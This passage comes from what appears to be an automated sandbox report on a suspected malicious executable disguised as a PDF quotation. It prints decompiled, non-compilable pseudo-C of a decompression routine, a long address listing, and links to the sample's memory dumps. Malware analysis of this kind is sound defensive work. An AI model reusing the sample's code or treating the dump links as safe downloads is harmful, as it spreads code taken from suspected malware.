								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00405ead
0x00405eb4
0x00405eba
0x00405ec0
0x00000000
0x00405ec4
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405ee6
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efb
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f46
0x00405f49
0x00405f71
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4b
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f63
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fba
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fbf
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fdc
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406022
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066ca
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406700
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406709
0x00406709
0x0040670d
0x004068bc
0x00000000
0x004068bc
0x00406719
0x00406720
0x00406728
0x00406728
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x00000000
0x004060d9
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x004060bc
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x00000000
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00000000
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x004068d2
0x004068d8
0x004068da
0x004068e1
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54

Uniqueness

Uniqueness Score: -1.00%

Function 004062EB, Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004062EB() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
